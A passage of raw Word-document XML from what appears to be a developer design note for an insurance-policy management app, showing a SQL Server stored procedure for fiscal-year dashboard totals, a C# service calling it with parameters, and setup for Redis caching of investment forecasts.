        </w:rPr>
        <w:t xml:space="preserve">    @NextFYEnd   DATE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">AS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    SET NOCOUNT ON;</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 Result Set 1: Core aggregates</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    SELECT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        SUM(CASE WHEN p.NextInstallmentDate BETWEEN @FYStart AND @FYEnd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                 THEN ISNULL(p.InstallmentAmount, p.PremiumAmount) ELSE 0 END) AS CurrentFYBudget,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        SUM(CASE WHEN p.MaturityDate BETWEEN @FYStart AND @FYEnd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                 THEN ISNULL(p.TotalMaturityAmount, p.CoverageAmount) ELSE 0 END) AS CurrentFYIncome,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        COUNT(CASE WHEN p.InstallmentType = 'One Time' AND p.Status = 'Active'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                   THEN 1 END) AS OneTimeCount,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        SUM(CASE WHEN p.InstallmentType = 'One Time' AND p.Status = 'Active'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                 THEN p.PremiumAmount ELSE 0 END) AS OneTimeTotal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    FROM Policies p</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    INNER JOIN FamilyMembers fm ON p.FamilyMemberId = fm.Id</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    WHERE p.IsDeleted = 0 AND p.Status = 'Active'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">      AND fm.Name IN (SELECT value FROM STRING_SPLIT(@MemberNames, ','));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">END</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Service Update — DashboardService.cs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">public async Task&lt;DashboardStatsDto&gt; GetStatsAsync(string[] selectedMembers)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    var memberList = string.Join(",", selectedMembers);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    var (fyStart, fyEnd) = FYHelper.GetCurrentFYRange();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    var nextFYStart = fyEnd.AddDays(1);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    var nextFYEnd = nextFYStart.AddYears(1).AddDays(-1);</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 Single call replaces 6 sequential queries</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    var result = await _context.Database.SqlQueryRaw&lt;DashboardRawDto&gt;(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        "EXEC sp_GetDashboardStats @p0, @p1, @p2, @p3, @p4",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        memberList, fyStart, fyEnd, nextFYStart, nextFYEnd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    ).FirstOrDefaultAsync();</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return _mapper.Map&lt;DashboardStatsDto&gt;(result);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec2-2" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2  Investment Forecast — Redis Distributed Caching</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ProjectInstallments loops through every policy for every month in a fiscal year — O(policies × 12) computations on every page load. For 200 policies, this is 2,400 iterations per request with no caching.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Package to Install</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">dotnet add package Microsoft.Extensions.Caching.StackExchangeRedis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Program.cs — Add Redis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">builder.Services.AddStackExchangeRedisCache(options =&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    options.Configuration = builder.Configuration["Redis:ConnectionString"];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    options.InstanceName = "PolicyMgr:";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">InvestmentForecastService.cs — Add Cache Layer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">public class InvestmentForecastService : IInvestmentForecastService</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    private readonly AppDbContext _context;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    private readonly IDistributedCache _cache;</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public async Task&lt;InvestmentForecastDto&gt; GetFullForecastAsync(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        int? fiscalYear, string[] selectedMembers)</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var fyYear = fiscalYear ?? FYHelper.GetCurrentFYStartYear();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        var memberKey = string.Join("-", selectedMembers.OrderBy(m =&gt; m));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        var cacheKey = $"forecast:{fyYear}:{memberKey.GetHashCode()}";</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 Try cache first</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        var cached = await _cache.GetStringAsync(cacheKey);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (cached != null)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
